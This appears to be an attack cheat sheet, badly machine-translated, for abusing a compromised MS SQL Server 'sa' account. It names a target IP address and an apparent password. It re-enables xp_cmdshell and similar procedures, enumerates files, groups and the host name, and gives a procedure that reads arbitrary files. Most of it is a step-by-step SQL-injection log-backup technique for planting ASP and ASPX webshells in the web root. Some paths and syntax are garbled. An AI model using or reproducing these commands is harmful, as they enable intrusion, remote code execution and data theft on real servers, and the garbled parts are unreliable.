Sa has different system Permissions

Objectives:
61.128.196.16
Sa
123321
Sp_addextendedproc xp_lake2, c: ecyclerxplake2.dll
Sp_addextendedproc xp_cmdshell, @ dllname = E: ewche2aboutXPLOG70. DLL
Exec sp_addextendedproc xp_cmdshell, xp_cmdshell.dll
Exec sp_addextendedproc xp_dirtree, xpstar. dll
Exec sp_addextendedproc sp_OACreate, odsole70.dll
Sp_dropextendedproc xp_lake2
-Obtain the ms SQL version.
Execute master .. sp_msgetversion
-Obtain the hard disk file information.
-- Parameter description: directory name, directory depth, and whether to display files
Execute master .. xp_dirtree c:
Execute master .. xp_dirtree c:, 1
Execute master .. xp_dirtree c:, 1, 1

-- Check file existence
Execute master .. xp_fileexist c: a. bak
-- List all windows Local Groups on the server
Execute master .. xp_enumgroups
-- Obtain the computer name of the current SQL server.
Execute master .. xp_getnetname

Exec sp_readTextFile c: aaa. asp
Create proc sp_readTextFile @ filename sysname
As

Begin
Set nocount on
Create table # tempfile (line varchar (8000 ))
Exec (bulk insert # tempfile from "+ @ filename + ")
Select * from # tempfile
Drop table # tempfile
End
Go
Execute master .. xp_dirtree c:, 1, 1
D: electronic warehouse \ ckgl
Cqmcck1

Alter database cqmcck1 set RECOVERY FULL
Create table cmd (a image )--
Backup log cqmcck1 to disk = c: cmd with init
Insert into cmd (a) values (<% eval (request ("a"): response. end %> )--
Backup log cqmcck1 to disk = d: electronic warehouse \ ckgli3.asp --
Drop table cmd --

<% Eval (request ("a"): response. end %> dedicated sentence for backup
Adding response. end will have a different effect, that is, all the code after a sentence is inserted is invalid. In a single sentence, it will reduce the webshell size.

Log backup is divided into seven steps of the WEBSHELL standard:

1. InjectionURL; alter database XXX set recovery full -- (set SQL to log FULL RECOVERY mode)

2. InjectionURL; create table cmd (a image) -- (create a new cmd table)

3. InjectionURL; backup log XXX to disk = c: cmd with init -- (reduce the size of the backup data)

4. InjectionURL; insert into cmd (a) values (<% 25 eval (request ("a"): response. end % 25>) -- (insert a sentence Trojan)

5. InjectionURL; backup log XXX to disk = d: chinakmest. asp -- (backup log to WEB path)

6. InjectionURL; drop table cmd -- (delete the new cmd table)

7. InjectionURL; alter database XXX set recovery simple -- (set SQL to SIMPLE log RECOVERY mode)

Alter database cqmcck1 set RECOVERY FULL
Create table cqmcck1.dbo. cmd (a image)
Backup log cqmcck1 to disk = c: TM with init
Insert into cqmcck1.dbo. cmd (a) values (<% @ Page Language = "C #" validateRequest = "false" %> <% System. IO. streamWriter ow = new System. IO. streamWriter (Server. mapPath ("I. aspx "), false); ow. write (Request. params ["m"]); ow. close () %>)
Backup log cqmcck1 to disk = d: electronic warehouse \ ckglim. aspx